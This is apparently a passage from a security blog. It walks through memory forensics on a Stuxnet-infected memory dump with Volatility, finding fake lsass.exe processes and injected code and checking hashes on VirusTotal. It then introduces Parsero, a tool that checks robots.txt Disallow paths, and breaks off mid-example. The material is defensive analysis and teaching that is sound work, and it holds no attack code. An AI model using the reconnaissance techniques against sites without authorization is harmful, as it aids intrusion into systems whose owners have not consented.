<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8rfVcqXbxI3gadlYdrNV_04_YOYar5yNGieTQuAke0pXwfnKPa0hA6xpnLnklRelInEHPQyLfEWWxBBHWiCmXB45nJ9fMsPI7nexCUuweGC77dMuPoBs8G9gk85jvFoCsoovDghz5jU/s1600/Stuxnet_II_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8rfVcqXbxI3gadlYdrNV_04_YOYar5yNGieTQuAke0pXwfnKPa0hA6xpnLnklRelInEHPQyLfEWWxBBHWiCmXB45nJ9fMsPI7nexCUuweGC77dMuPoBs8G9gk85jvFoCsoovDghz5jU/s640/Stuxnet_II_14.png" height="232" width="640" /></a></div>
<br />
With these key registers, Stuxnet will be started in each computer restart.<br />
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-76772068999995165832014-01-06T00:14:00.000-08:002014-01-12T02:34:54.984-08:00Stuxnet Trojan - Memory Forensics with Volatility | Part I<div style="text-align: justify;">
Stuxnet could be the first advanced malware. It is thought that it was developed by the United States and Israel to attack Iran's nuclear facilities. It attacked Windows systems using a zero-day exploit and It was focused on SCADA systems in order to affect critical infrastructures... Also, it may be spread from USB drivers. It is necessary a squad of highly capable programmers with depth of knowledge of industrial processes and an interest in attacking industrial infrastructure to develop this malware.<br />
<br />
Kaspersky Lab concluded that the sophisticated attack could only have
been conducted "with nation-state support" and a study of the spread of
Stuxnet by Symantec says that it was spread to Iran (58.85%), Indonesia
(18.22%), India (8.31%), Azerbaijan (2.57%).... <br />
<br />
Thanks to Malware Cookbook we can download a memory dump from an infected host with this malware in the URL below: </div>
<br />
<a href="http://malwarecookbook.googlecode.com/svn/trunk/stuxnet.vmem.zip" target="_blank">http://malwarecookbook.googlecode.com/svn/trunk/stuxnet.vmem.zip</a><br />
<br />
Ok, let’s go. We are going to analyze it with Volatility.<br />
<h3>
STUXNET IMAGE INFO</h3>
<div style="text-align: justify;">
First of all we want to get more info of the memory image. With the command below we can see the volatility suggested profile and when the image was dumped. In this case it was in 2011-06-03.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem imageinfo</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcGCHAMCvB9wIxYPjuocBDLU-yoze-uCPXqo4HF8zW53XvPfb-ZFB5KbAFaq3-iZkfYCtg5zfkEFhdGritBriSxMBgEpCPPqrnYYNM_b1SGejHhubdO0l4tOf51CqCSzcsjM1yKA4buZo/s1600/Stuxnet_II_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcGCHAMCvB9wIxYPjuocBDLU-yoze-uCPXqo4HF8zW53XvPfb-ZFB5KbAFaq3-iZkfYCtg5zfkEFhdGritBriSxMBgEpCPPqrnYYNM_b1SGejHhubdO0l4tOf51CqCSzcsjM1yKA4buZo/s640/Stuxnet_II_1.png" height="230" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
It is a good practice to export the profile WinXPSP3x86 in order not to specify more this profile in the Volatility commands.</div>
<pre class="brush: java">export VOLATILITY_PROFILE=WinXPSP3x86</pre>
<h3>
DETECTING MALICIOUS PROCESS</h3>
<div style="text-align: justify;">
First of all, I usually want to know what process was running the computer when the memory was dumped.</div>
<br />
<div style="text-align: justify;">
Notice you will see that three lsass.exe processes were running… It draws our attention.</div>
<br />
<ul>
<li>lsass.exe Pid 680</li>
<li>lsass.exe Pid 868</li>
<li>lsass.exe Pid 1928</li>
</ul>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem pslist</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwc6R9AOKGF926lcOlArS-GzntzZBVDzg2mmsgglcHYk9DZqhoynEX1vYNV0mmmt04G3ktv2AMFETjNef9cH_SvlKQAa8vfIi6M8e51lGqd81uwPkEzYN3VZifo7hNLO7Hb5myH-F9i0I/s1600/Stuxnet_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwc6R9AOKGF926lcOlArS-GzntzZBVDzg2mmsgglcHYk9DZqhoynEX1vYNV0mmmt04G3ktv2AMFETjNef9cH_SvlKQAa8vfIi6M8e51lGqd81uwPkEzYN3VZifo7hNLO7Hb5myH-F9i0I/s640/Stuxnet_2.png" height="467" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
We know that lsass.exe is one of the first processes to start when Windows boots. Because of this, it’s normal that “lsass.exe” has a lower Pid. You can see when the three lsass.exe process started in the picture above:</div>
<br />
<ul>
<li>Pid 680 started at 2010-10-29 17:08:54</li>
<li>Pid 868 started at 2011-06-03 04:26:55</li>
<li>Pid 1928 started at 2011-06-03 04:26:55</li>
</ul>
<br />
<ul>
</ul>
<div style="text-align: justify;">
You can see the “lsass.exe” with lower Pid (680) started in 2010 and the other ones with higher Pid (868 and 1928) started in 2011. It isn’t a normal behavior.</div>
<br />
<div style="text-align: justify;">
In the picture below we can notice that Winlogon.exe (Pid 624) started one of the “lsass.exe” process (Pid 680). This is a really good indication of which “lsass.exe” isn’t malicious, because Winlogon.exe always starts the real “lsass.exe”. The “lsass.exe” with Pid 868 and 1928 was started by the “services.exe” process. It isn’t a normal behavior. They could be malicious processes.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem pstree | egrep '(services.exe|lsass.exe|winlogon.exe)'</pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWSXDgYC9NnSobdTzZDc_4sJVzKLqbw4dB9aJpOTehagCma7stQpyS0n2heoIGs0s1mjyUW3aaSlW-HslYg-peb9ZOPlQN32VcfVahuSowGu-HEaiZIaR3NHe98QnYoMd0Ge6aL_kFSU/s1600/Stuxnet_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWSXDgYC9NnSobdTzZDc_4sJVzKLqbw4dB9aJpOTehagCma7stQpyS0n2heoIGs0s1mjyUW3aaSlW-HslYg-peb9ZOPlQN32VcfVahuSowGu-HEaiZIaR3NHe98QnYoMd0Ge6aL_kFSU/s640/Stuxnet_3.png" height="68" width="640" /></a></div>
<br />
We have just discovered two suspicious processes.<br />
<h3>
DETECTING MALICIOUS CONNECTIONS</h3>
<div style="text-align: justify;">
It is really important to indentify if theses suspicious processes were making connections. With the command below we can check it.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem connections</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipqY3x2vXeCa0Duk5gO43CmZpOxwXwX3A2f42RhYqz3d7u69wbmwGUp87h-JZSTZ0-vR7TW1jiZDlnzanrXFfJ10H6cMuNpz8pdOEVxJygpNM9zOd8KvdsB0181VPldq1v-WMGccrHA3E/s1600/Stuxnet_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipqY3x2vXeCa0Duk5gO43CmZpOxwXwX3A2f42RhYqz3d7u69wbmwGUp87h-JZSTZ0-vR7TW1jiZDlnzanrXFfJ10H6cMuNpz8pdOEVxJygpNM9zOd8KvdsB0181VPldq1v-WMGccrHA3E/s640/Stuxnet_4.png" height="58" width="640" /></a></div>
<br />
No connections were establishing when the memory was dumped. Now, we are going to see the ports that were listening in the computer.<br />
<br />
<div style="text-align: justify;">
In the picture bellow you will see a “lsass.exe” with Pid 680 is bound to Port 500 and 4500, while “lsass.exe” with Pid 868 and the another one with Pid 1928 are not listening in these ports. It seems again that the “lsass.exe” with the PID 680 has a normal behavior because this process usually listens on these ports.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem sockets</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrBdoLvyCnf2LjnmS1nUXZvkyOwU5LfZF_jqQJI72wF6shnm_Lr8iKKGka4r2z6HSNd79zyXTW7MLbZNa335C3SvKGsKwWOHl6kzWmz1NygvRkyVyTiTNOC3rY2hyphenhyphenHPIWt5ngtB3V9d2M/s1600/Stuxnet_04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrBdoLvyCnf2LjnmS1nUXZvkyOwU5LfZF_jqQJI72wF6shnm_Lr8iKKGka4r2z6HSNd79zyXTW7MLbZNa335C3SvKGsKwWOHl6kzWmz1NygvRkyVyTiTNOC3rY2hyphenhyphenHPIWt5ngtB3V9d2M/s640/Stuxnet_04.png" height="238" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h3>
DETECTING DLL</h3>
<div style="text-align: justify;">
The “lsass.exe” process with PID 680 appears to be a normal process… What’s happened with the other ones?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With the command below, we can check that “lsass.exe” with Pid 868 and Pid 1928 have a load lower DLLs.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem dlllist –p 680 | wc –l
python2 vol.py -f stuxnet.vmem dlllist –p 868 | wc –l
python2 vol.py -f stuxnet.vmem dlllist –p 1928 | wc –l</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfb7MW57FiOXgnlqrLPYt7cXK47a0uPdZDlCeEz9tj0CNW1yRbwB9obucqTV58OkhOG226YvTuv39818zaK3lgtXXUux70E6Ht0wIT0IIL9JQn47Wi7HdYo1fAbHfT349JENdJ5-tJy3I/s1600/Stuxnet_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfb7MW57FiOXgnlqrLPYt7cXK47a0uPdZDlCeEz9tj0CNW1yRbwB9obucqTV58OkhOG226YvTuv39818zaK3lgtXXUux70E6Ht0wIT0IIL9JQn47Wi7HdYo1fAbHfT349JENdJ5-tJy3I/s640/Stuxnet_6.png" height="112" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<span id="goog_1753205994">Also, we can detect that the process with Pid 1928 has unlinked DLLs.</span><br />
<pre class="brush: java">python2 vol.py -f stuxnet.vmem ldrmoudles –p 1928</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0x4qj_osc-hfFee3gplZI0k5w-u6yWtt0_3VIYiXddYeTiNB6jfxze84Nxs8LwBXKcNGYHL120xUENSTQ1oYfJ9nmrAZ1tBsd3tD9vpXxG5fbOu6sZ0yoM8lhXgL5IamMNAFpU3ZE9E0/s1600/Stuxnet_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0x4qj_osc-hfFee3gplZI0k5w-u6yWtt0_3VIYiXddYeTiNB6jfxze84Nxs8LwBXKcNGYHL120xUENSTQ1oYfJ9nmrAZ1tBsd3tD9vpXxG5fbOu6sZ0yoM8lhXgL5IamMNAFpU3ZE9E0/s640/Stuxnet_7.png" height="246" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<span id="goog_1753205994">We can get more information about it with this command.</span><br />
<pre class="brush: java">python2 vol.py -f stuxnet.vmem ldrmoudles –p 1928 -v</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMGRgqxQCJkpOiratsO36CdZe0MVc1jk_R-J351kCOBqIsa2vQ3nW6D1dgcg4dvfp67qXg4CXA5ilUnzzCfLJWgOluYCU4sGO28jxbid-LQD5ionZn7Ge4meNqmeeNSF3JsdoCRgW5F9c/s1600/Stuxnet_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMGRgqxQCJkpOiratsO36CdZe0MVc1jk_R-J351kCOBqIsa2vQ3nW6D1dgcg4dvfp67qXg4CXA5ilUnzzCfLJWgOluYCU4sGO28jxbid-LQD5ionZn7Ge4meNqmeeNSF3JsdoCRgW5F9c/s640/Stuxnet_8.png" height="64" width="640" /></a></div>
<br />
<span id="goog_1753205994">These kernel calls are directly related with stuxnet worm. See the URL below:</span><br />
<span id="goog_1753205994"><br /><a href="http://www.f-secure.com/v-descs/trojan-dropper_w32_stuxnet.shtml" target="_blank">http://www.f-secure.com/v-descs/trojan-dropper_w32_stuxnet.shtml</a></span><br />
<h3>
<span id="goog_1753205994">DETECTING INJECTED CODE</span></h3>
<div style="text-align: justify;">
<span id="goog_1753205994"></span><span id="goog_1753205994"><span id="goog_1753205994">The malfind command helps us to find hidden
or injected code/DLLs in the user mode memory. Then we are going to
export these DLLs and we will upload them to www.virustotal.com in order to check if an
anti-virus detects them.</span></span></div>
<br />
<div style="text-align: justify;">
<span id="goog_1753205994"><span id="goog_1753205994">We already know that the process </span></span><span id="goog_1753205994"><span id="goog_1753205994">with PID 680 is normal. For this reason we will continue with the other ones.</span></span></div>
<div style="text-align: justify;">
<pre class="brush: java">python2 vol.py -f stuxnet.vmem malfind –p 868 –dump-dir evidences/</pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp2nBlN0A_bx6MZ8Rl_qxV-GxWarZnblsTJE-ILoUVNnt5fyPy0E-hRfO3OoLyEjvT_TPveui0xtu2wE465QJMpOWk4PqP8Ujnfk5blP8cmGZsgbJ3BTCdSd5e8aG-8Zzp25sxot_-lwI/s1600/Stuxnet_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp2nBlN0A_bx6MZ8Rl_qxV-GxWarZnblsTJE-ILoUVNnt5fyPy0E-hRfO3OoLyEjvT_TPveui0xtu2wE465QJMpOWk4PqP8Ujnfk5blP8cmGZsgbJ3BTCdSd5e8aG-8Zzp25sxot_-lwI/s640/Stuxnet_10.png" height="234" width="640" /></a></div>
<div style="text-align: justify;">
<br />
<span id="goog_1753205994">We can see two files have been created. We continue doing the same with the “lsass.exe” process with Pid 1928.</span></div>
<div style="text-align: justify;">
<pre class="brush: java">python2 vol.py -f stuxnet.vmem malfind –p 1928 –dump-dir evidences/</pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNyacC1CxKdTy3VIIbL2NK33ISL6MuizpGemHvyJKhBg-XjSxPXjqNB_1nkg01kGbzH5Gzgk_yfHvTJcykJmLp_mXIck8PvhDXbMjJ1c7BDrDwV7cu9JFQX5881zzHXZ83VFgzFw6EsZg/s1600/Stuxnet_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNyacC1CxKdTy3VIIbL2NK33ISL6MuizpGemHvyJKhBg-XjSxPXjqNB_1nkg01kGbzH5Gzgk_yfHvTJcykJmLp_mXIck8PvhDXbMjJ1c7BDrDwV7cu9JFQX5881zzHXZ83VFgzFw6EsZg/s640/Stuxnet_13.png" height="214" width="640" /></a></div>
<span id="goog_1753205994"></span><br />
<div style="text-align: justify;">
<span id="goog_1753205994"><span id="goog_1753205994">The next step will be to upload to www.virustotal.com these files in order to check if some anti-virus vendor detects them as malicious files. In order to not upload the files, we will obtain the sha256 checksum of the files and then we will search on the Virustotal website.</span></span><br />
<pre class="brush: java">sha256sum *.dmp</pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1fMxjlYTDNgcZjfPNPts32Qm8qyttHU9RaWuRtGndWihee-dWdNVVS8O-mCa1AjY7iNBLyA4-htLuj4Tig4X6nMLFLav3bct0sahoFwSgXxZ5cU2OGwIp310Dub7z4_NSto9SZ4f0U2U/s1600/Stuxnet_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1fMxjlYTDNgcZjfPNPts32Qm8qyttHU9RaWuRtGndWihee-dWdNVVS8O-mCa1AjY7iNBLyA4-htLuj4Tig4X6nMLFLav3bct0sahoFwSgXxZ5cU2OGwIp310Dub7z4_NSto9SZ4f0U2U/s640/Stuxnet_14.png" height="104" width="640" /></a></div>
<br />
Here, you have the links to Virustotal with the report of the files which have been analyzed:<br />
<br />
<a href="https://www.virustotal.com/en/file/e97d61f7393ac5838a1800f3e9aa22c6205f4d7e2bde494573d35c57bc9b7819/analysis/" target="_blank"><span id="goog_1753205994">https://www.virustotal.com/en/file/e97d61f7393ac5838a1800f3e9aa22c6205f4d7e2bde494573d35c57bc9b7819/analysis/</span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/163b7da37df4ae6dafbfb5bf88b319dabf7846cee73d4192c6a7593e835857a8/analysis/" target="_blank"><span id="goog_1753205994">https://www.virustotal.com/en/file/163b7da37df4ae6dafbfb5bf88b319dabf7846cee73d4192c6a7593e835857a8/analysis/</span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/abce3e79e26b5116fe7f3d40d21eaa4c8563e433b6086f9ec07c2925593f69dc/analysis/" target="_blank"><span id="goog_1753205994">https://www.virustotal.com/en/file/abce3e79e26b5116fe7f3d40d21eaa4c8563e433b6086f9ec07c2925593f69dc/analysis/</span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/2b2945f7cc7cf5b30ccdf37e2adbb236594208e409133bcd56f57f7c009ffe6d/analysis/" target="_blank"><span id="goog_1753205994"><span id="goog_1753205994">https://www.virustotal.com/en/file/2b2945f7cc7cf5b30ccdf37e2adbb236594208e409133bcd56f57f7c009ffe6d/analysis/</span></span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/10f07b9fbbc6a8c6dc4abf7a3d31a01e478accd115b33ec94fe885cb296a3586/analysis/" target="_blank"><span id="goog_1753205994"><span id="goog_1753205994"><span id="goog_1753205994">https://www.virustotal.com/en/file/10f07b9fbbc6a8c6dc4abf7a3d31a01e478accd115b33ec94fe885cb296a3586/analysis/</span></span></span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/a4b4b29f0df45283b629203b080c09ddb5bc6eb4cd8e9b725f75121a8b7e728e/analysis/" target="_blank"><span id="goog_1753205994"><span id="goog_1753205994"><span id="goog_1753205994"><span id="goog_1753205994">https://www.virustotal.com/en/file/a4b4b29f0df45283b629203b080c09ddb5bc6eb4cd8e9b725f75121a8b7e728e/analysis/</span></span></span></span></a><br />
<br />
<span id="goog_1753205994"><span id="goog_1753205994"><span id="goog_1753205994"><span id="goog_1753205994"><a href="https://www.virustotal.com/en/file/2b2945f7cc7cf5b30ccdf37e2adbb236594208e409133bcd56f57f7c009ffe6d/analysis/" target="_blank">https://www.virustotal.com/en/file/2b2945f7cc7cf5b30ccdf37e2adbb236594208e409133bcd56f57f7c009ffe6d/analysis/</a></span></span></span></span><br />
<br />
<span id="goog_1753205994"><span id="goog_1753205994">Notice that the majority of them have been detected as Stuxnet Worm</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvnJzSsVjAn7rx8bqcE6BDUjolPA-_opdNvms963eEluPHD4-EXWf5T4gS8uQuT1PyTIvIz6_3epLLWk7b0LEe3coevYDaSjqeAS2pDB4NwUgr9laD2GIw-dOuf4aSnQA_sifVdfp-y7M/s1600/Stuxnet_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvnJzSsVjAn7rx8bqcE6BDUjolPA-_opdNvms963eEluPHD4-EXWf5T4gS8uQuT1PyTIvIz6_3epLLWk7b0LEe3coevYDaSjqeAS2pDB4NwUgr9laD2GIw-dOuf4aSnQA_sifVdfp-y7M/s640/Stuxnet_15.png" height="298" width="640" /></a></div>
<br />
<h3>
Stuxnet Trojan - Memory Forensics with Volatility | Part II</h3>
Continue reading the second part here:<br />
<a href="http://www.behindthefirewalls.com/2014/01/stuxnet-memory-forensics-volatility-II.html">http://www.behindthefirewalls.com/2014/01/stuxnet-memory-forensics-volatility-II.html</a><br />
<br />
<br />
<span id="goog_1753205994"></span><span id="goog_1753205994"> </span><span id="goog_1753205995"></span>Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-79565693317240100642013-12-08T01:56:00.000-08:002014-02-05T00:37:31.790-08:00Parsero: The tool to audit the Robots.txt automatically<div style="text-align: justify;">
When I was writing <a href="http://www.behindthefirewalls.com/2013/07/using-robotstxt-to-locate-your-targets.html" target="_blank">Using robots.txt to locate your targets</a>, I felt the necessity of developing a tool to make automatic the task of auditing the Robots.txt file of the web servers.<br />
<br />
Now, I am really proud of introducing you my first tool called <a href="https://github.com/behindthefirewalls/Parsero" target="_blank">Parsero</a>. I hope you enjoy it...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Jp-6xfNpTD9UGa71ZxKpA14nlKnpWZ13FNikztOw9Exj1D-AZw60uvLaCubI85DRuwQ1sZ3L9ITxqRbBeCrHqi1r33UztldLKzXKnNHVIcHX5xscXLddbo4nleIbx4sk731lQpy7118/s1600/Parsero_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Jp-6xfNpTD9UGa71ZxKpA14nlKnpWZ13FNikztOw9Exj1D-AZw60uvLaCubI85DRuwQ1sZ3L9ITxqRbBeCrHqi1r33UztldLKzXKnNHVIcHX5xscXLddbo4nleIbx4sk731lQpy7118/s1600/Parsero_logo.png" /></a></div>
<h3>
Introductions</h3>
One of the things you need to do when you are auditing a website is to look at the Robots.txt file, for example: <a href="http://www.behindthefirewalls.com/robots.txt" target="_blank">http://www.behindthefirewalls.com/robots.txt</a>. The web administrators write this file to tell the crawlers like Google, Bing, Yahoo... what content they are allowed to index or what directories mustn't be indexed.<br />
<br /></div>
<div style="text-align: justify;">
<u>But... Why the administrators want to hide some web directories to the crawlers?</u></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Sometimes they want to hide the web portal login, management directories, private info, sensitive data, page with vulnerabilities, documents, etc... If they hide these directories from the crawlers, then they can't be found making Google Hacking or just searching in the search engines...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Why do you need Parsero?</u></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We've said that the administrators tell the crawlers what directories or files hosted on the web server are not allowed to be indexed. They achieve this purpose by writing so much "Disallow: /URL_Path" as they want in the Robots.txt file pointing to these directories. Sometimes these paths typed in the Disallows entries are directly accessible by the users (without using a search engine) just visiting the URL and the Path even sometimes they are not available to be visited by anybody... Because it is really common that the administrators write a lot of Disallows and some of them are available and some of them are not, you can use Parsero in order to check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
When we execute Parsero, we can see the HTTP status codes. For example, the codes bellow:<br />
<br /></div>
<ul>
<li>200 OK The request has succeeded.</li>
<li>403 Forbidden The server understood the request, but is refusing to fulfill it.</li>
<li>404 Not Found The server hasn't found anything matching the Request-URI.</li>
<li>302 Found The requested resource resides temporarily under a different URI</li>
<li>... </li>
</ul>
<ul>
</ul>
<h3>
Installation</h3>
Parsero needs at least Python3 and can be executed in all Operating Systems which support this language development. Also it needs Urllib3.<br />
<pre class="brush: java">sudo apt-get install python3
sudo apt-get install python3-pip
sudo pip-3.3 install urllib3
</pre>
When you have installed these software, just download the project from:
<br /><br />
<a href="https://github.com/behindthefirewalls/Parsero" target="_blank">https://github.com/behindthefirewalls/Parsero</a><br />
<br />
<a href="https://github.com/behindthefirewalls/Parsero/archive/master.zip" target="_blank">https://github.com/behindthefirewalls/Parsero/archive/master.zip</a><br />
<br />
In Linux you can use the command bellow.<br />
<br />
<pre class="brush: java">git clone https://github.com/behindthefirewalls/Parsero.git</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitCSJwt9xyEHNt6689e6vWTYQLTOTUeyqEgFMTR7PCtk_oTPzCL9ZEPF7AI0Nlns74RbyNRhvDjyBKS58CVDdFL2HGwomNmmqlACURqxRMS2i2wIiowYw9UgWmR51kEEHw4YXju92RyNI/s1600/Parsero1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitCSJwt9xyEHNt6689e6vWTYQLTOTUeyqEgFMTR7PCtk_oTPzCL9ZEPF7AI0Nlns74RbyNRhvDjyBKS58CVDdFL2HGwomNmmqlACURqxRMS2i2wIiowYw9UgWmR51kEEHw4YXju92RyNI/s1600/Parsero1.png" /></a></div>
<br />
When you download Parsero, you will see a folder with three files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Crg0rpIRJzir1shNBwbbbwvEXb-J9ptEpV31hJx4v8wOTLOFMDqBvvoeOVr3-_TwgsT5cfuQ2hI62vJvX5_9PSatbfYq10Pm1m5aH_Uoc_0xNsXrd1fXBguIvLlDzf7_yjyK0CAGsbo/s1600/Parsero_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Crg0rpIRJzir1shNBwbbbwvEXb-J9ptEpV31hJx4v8wOTLOFMDqBvvoeOVr3-_TwgsT5cfuQ2hI62vJvX5_9PSatbfYq10Pm1m5aH_Uoc_0xNsXrd1fXBguIvLlDzf7_yjyK0CAGsbo/s1600/Parsero_2.png" /></a></div>
<br />
<div style="text-align: justify;">
Before start, you need to check that your default Python version is 3 or later. If you have already installed Python3 but is not your default version, you can run the script using the command "python3 parsero.py" instead of "python parsero.py".</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinBYLkGByC-y9dm4Rj94tv3iKvhwsOi3asz8audbnDQftYeUrol5LRzFvPPN21LRT7gPBhzXp-OXcXg1T2gP_mFQauwyLyEPBz9gTQuy7RvZNmPbpWJg4XZJcTlYh1rVUNEtECrmMiB9E/s1600/Parsero_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinBYLkGByC-y9dm4Rj94tv3iKvhwsOi3asz8audbnDQftYeUrol5LRzFvPPN21LRT7gPBhzXp-OXcXg1T2gP_mFQauwyLyEPBz9gTQuy7RvZNmPbpWJg4XZJcTlYh1rVUNEtECrmMiB9E/s1600/Parsero_3.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
If you don't type any argument, you will see the help bellow.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaHXy4HbFLe0xv61_VwaK-rTV_-cE0r0-H0grta9gHezW86_3H1ZPV1XoU3Q2DOn9xwOXvoTjU3bnAYx7obRNyEYys_keG2J10-5SAAVsmSdEMpevR6OMmiNoOuoK2q39WKpGgFmT-esI/s1600/Parsero_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaHXy4HbFLe0xv61_VwaK-rTV_-cE0r0-H0grta9gHezW86_3H1ZPV1XoU3Q2DOn9xwOXvoTjU3bnAYx7obRNyEYys_keG2J10-5SAAVsmSdEMpevR6OMmiNoOuoK2q39WKpGgFmT-esI/s1600/Parsero_4.png" /></a></div>
<br />
<h3>
Example 1</h3>
<div style="text-align: justify;">
In the picture below you can see the Robots.txt file of a web server in one of my environments. If you are a web security auditor, you should check all the Disallows in order to try to get some valuable information. The security auditor should want to know what directories or files are hosted in the web servers which the administrators don't want to be published on the search engines.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
